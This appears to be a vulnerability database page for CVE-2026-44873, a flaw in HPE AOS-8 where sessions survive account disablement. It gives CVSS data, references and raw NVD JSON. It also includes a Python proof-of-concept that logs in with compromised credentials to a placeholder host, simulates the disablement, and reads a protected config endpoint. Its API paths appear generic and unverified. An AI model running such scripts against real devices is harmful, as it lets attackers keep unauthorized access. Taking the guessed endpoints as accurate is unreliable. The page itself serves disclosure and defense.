CVE-2026-44873

Description

A session management vulnerability in AOS-8 allows previously authenticated users to retain network access after their accounts are administratively disabled. Existing sessions are not invalidated when credentials are revoked, enabling continued access until session expiration. An attacker with compromised credentials could exploit this behavior to maintain unauthorized access even after the account has been disabled.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

HPE AOS-8 (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Proof of Concept for CVE-2026-44873
# This script demonstrates that a session remains valid after account disablement.

TARGET_URL = "https://aos-8-device.example.com/api"
# Attacker obtains credentials and logs in
session = requests.Session()
login_data = {"username": "victim_user", "password": "compromised_pass"}
response = session.post(f"{TARGET_URL}/login", data=login_data)

if response.status_code == 200:
    print("[+] Login successful. Session established.")
    print(f"[+] Session Cookie: {session.cookies.get_dict()}")

    # Simulate Administrator disabling the account 'victim_user'
    # In a real scenario, this happens externally or via another admin session
    print("\n[!] Simulating: Administrator disables 'victim_user' account...")

    # Attacker attempts to access a protected resource using the existing session
    # Vulnerable system allows this because it doesn't check account status against active sessions
    protected_resource = session.get(f"{TARGET_URL}/network/config")

    if protected_resource.status_code == 200:
        print("[+] Exploit successful! Access retained despite account being disabled.")
        print(f"[+] Data leaked: {protected_resource.text[:100]}...")
    else:
        print("[-] Access denied. Session was invalidated.")
else:
    print("[-] Login failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44873
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44873
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44873/
[4] VulDB https://vuldb.com/cve/CVE-2026-44873
[5] https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44873", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:45.907", "lastModified": "2026-05-12T20:16:45.907", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A session management vulnerability in AOS-8 allows previously authenticated users to retain network access after their accounts are administratively disabled. Existing sessions are not invalidated when credentials are revoked, enabling continued access until session expiration. An attacker with compromised credentials could exploit this behavior to maintain unauthorized access even after the account has been disabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}